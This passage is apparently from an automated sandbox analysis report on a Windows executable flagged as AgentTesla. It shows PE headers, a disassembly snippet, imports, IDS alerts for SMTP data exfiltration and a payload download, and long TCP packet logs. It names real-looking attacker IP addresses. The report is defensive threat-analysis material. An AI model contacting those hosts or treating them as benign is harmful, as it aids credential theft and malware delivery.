                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                  Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:61259b55b8912888e90f516ca08dc514

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 000003F4h
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  push 00000020h
                                                                                  pop edi
                                                                                  xor ebx, ebx
                                                                                  push 00008001h
                                                                                  mov dword ptr [ebp-14h], ebx
                                                                                  mov dword ptr [ebp-04h], 0040A230h
                                                                                  mov dword ptr [ebp-10h], ebx
                                                                                  call dword ptr [004080C8h]
                                                                                  mov esi, dword ptr [004080CCh]
                                                                                  lea eax, dword ptr [ebp-00000140h]
                                                                                  push eax
                                                                                  mov dword ptr [ebp-0000012Ch], ebx
                                                                                  mov dword ptr [ebp-2Ch], ebx
                                                                                  mov dword ptr [ebp-28h], ebx
                                                                                  mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                  call esi
                                                                                  test eax, eax
                                                                                  jne 00007FE7A4A38BDAh
                                                                                  lea eax, dword ptr [ebp-00000140h]
                                                                                  mov dword ptr [ebp-00000140h], 00000114h
                                                                                  push eax
                                                                                  call esi
                                                                                  mov ax, word ptr [ebp-0000012Ch]
                                                                                  mov ecx, dword ptr [ebp-00000112h]
                                                                                  sub ax, 00000053h
                                                                                  add ecx, FFFFFFD0h
                                                                                  neg ax
                                                                                  sbb eax, eax
                                                                                  mov byte ptr [ebp-26h], 00000004h
                                                                                  not eax
                                                                                  and eax, ecx
                                                                                  mov word ptr [ebp-2Ch], ax
                                                                                  cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                  jnc 00007FE7A4A38BAAh
                                                                                  and word ptr [ebp-00000132h], 0000h
                                                                                  mov eax, dword ptr [ebp-00000134h]
                                                                                  movzx ecx, byte ptr [ebp-00000138h]
                                                                                  mov dword ptr [0042A318h], eax
                                                                                  xor eax, eax
                                                                                  mov ah, byte ptr [ebp-0000013Ch]
                                                                                  movzx eax, ax
                                                                                  or eax, ecx
                                                                                  xor ecx, ecx
                                                                                  mov ch, byte ptr [ebp-2Ch]
                                                                                  movzx ecx, cx
                                                                                  shl eax, 10h
                                                                                  or eax, ecx

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x63d38.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x66760x6800False0.656813401442data6.41745998719IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xa0000x203780x600False0.509765625data4.11058212765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                  .ndata0x2b0000x270000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x520000x63d380x63e00False0.295598990926data5.64645184571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  RT_BITMAP0x523d00x368dataEnglishUnited States
                                                                                  RT_ICON0x527380x4180cdataEnglishUnited States
                                                                                  RT_ICON0x93f480x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                  RT_ICON0xa47700x94a8dataEnglishUnited States
                                                                                  RT_ICON0xadc180x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                  RT_ICON0xb1e400x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 95EnglishUnited States
                                                                                  RT_ICON0xb43e80x988dataEnglishUnited States
                                                                                  RT_ICON0xb4d700x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                  RT_DIALOG0xb51d80xb8dataEnglishUnited States
                                                                                  RT_DIALOG0xb52900x144dataEnglishUnited States
                                                                                  RT_DIALOG0xb53d80x13cdataEnglishUnited States
                                                                                  RT_DIALOG0xb55180x100dataEnglishUnited States
                                                                                  RT_DIALOG0xb56180x11cdataEnglishUnited States
                                                                                  RT_DIALOG0xb57380x60dataEnglishUnited States
                                                                                  RT_GROUP_ICON0xb57980x68dataEnglishUnited States
                                                                                  RT_VERSION0xb58000x1f4dataEnglishUnited States
                                                                                  RT_MANIFEST0xb59f80x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                  Imports

                                                                                  DLLImport
                                                                                  ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                  ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                  USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                  Version Infos

                                                                                  DescriptionData
                                                                                  ProductNameWadiesant
                                                                                  FileDescriptionUnpackagedfotomo
                                                                                  FileVersion19.29.0
                                                                                  CommentsCHONDROITI
                                                                                  CompanyNameConteketra
                                                                                  Translation0x0409 0x04b0

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                  192.168.11.2045.10.148.33497635872030171 05/27/22-19:42:44.865082TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49763587192.168.11.2045.10.148.33
                                                                                  192.168.11.2045.10.148.33497635872840032 05/27/22-19:42:44.865135TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249763587192.168.11.2045.10.148.33
                                                                                  192.168.11.20185.222.57.7949754802018752 05/27/22-19:41:07.264505TCP2018752ET TROJAN Generic .bin download from Dotted Quad4975480192.168.11.20185.222.57.79

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 27, 2022 19:41:07.246526003 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.259922028 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.260132074 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.264504910 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.278637886 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.278716087 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.278772116 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.278786898 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.278795958 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.278893948 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.279021025 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.292305946 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.292381048 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.292438030 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.292452097 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.292453051 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.292480946 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.292500973 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.292515993 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.292530060 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.292540073 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.292548895 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.292603016 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.292692900 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.305855036 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.305934906 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.305948019 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306005955 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.306052923 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306139946 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.306189060 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306194067 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.306231022 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306245089 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306257010 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306271076 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306284904 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306298971 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306309938 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.306313992 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.306322098 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306332111 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306340933 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306350946 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306358099 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.306364059 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306372881 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306380033 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.306407928 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.306505919 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.306555986 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.319349051 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.319432974 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.319442987 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.319567919 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.319616079 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.319740057 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.319849968 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.319890976 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.319909096 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.319924116 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.319947958 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.319962025 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.319977045 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.319989920 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.319991112 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320000887 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320097923 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.320113897 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320130110 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320167065 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320180893 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320200920 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320215940 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320224047 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.320230007 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320257902 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320272923 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320286989 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320313931 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.320314884 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320328951 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320343971 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320363998 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320379019 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320393085 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320394993 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.320408106 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320420027 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320477962 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320487022 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.320565939 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.320620060 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.332973003 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.333053112 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.333106995 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.333122015 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.333122969 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.333132029 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.333273888 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.333328962 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.333390951 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.333473921 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.333533049 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.333547115 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.333555937 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.333606958 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.333688974 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.333791971 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.333887100 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.333940029 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.333940983 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.333955050 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334039927 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.334064960 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334080935 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334111929 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.334116936 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334131956 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334156990 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334172010 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334187984 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334213972 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334228039 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334254980 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334254980 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.334270000 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334284067 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334307909 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334317923 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.334322929 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334337950 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334352016 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334372044 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.334372997 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334388018 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334403992 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334418058 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334431887 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334448099 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334453106 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.334461927 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334484100 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334500074 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334515095 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334528923 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334556103 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334570885 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334585905 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334597111 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.334610939 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334625959 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334640026 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334669113 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334682941 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334686995 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.334698915 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334716082 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334729910 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334744930 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334758997 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334773064 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334781885 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.334922075 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.346499920 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.346575022 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.346628904 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.346645117 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.346654892 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.346757889 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.346827030 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.346883059 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.346884012 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.346899033 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.346913099 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.346921921 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.346944094 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.346957922 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.347006083 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.347007990 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.347021103 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.347029924 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.347073078 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.347080946 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.347131968 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.347146988 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.347152948 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.347161055 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.347171068 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.347202063 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.347321987 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.347359896 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.347456932 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.347558022 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.348062992 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.348170996 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.348206043 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.348226070 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.348241091 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.348254919 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.348269939 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.348287106 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.348301888 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.348367929 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.348371983 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.348416090 CEST4975480192.168.11.20185.222.57.79
                                                                                  May 27, 2022 19:41:07.358963013 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359050989 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359110117 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359124899 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359148026 CEST8049754185.222.57.79192.168.11.20
                                                                                  May 27, 2022 19:41:07.359148979 CEST4975480192.168.11.20185.222.57.79
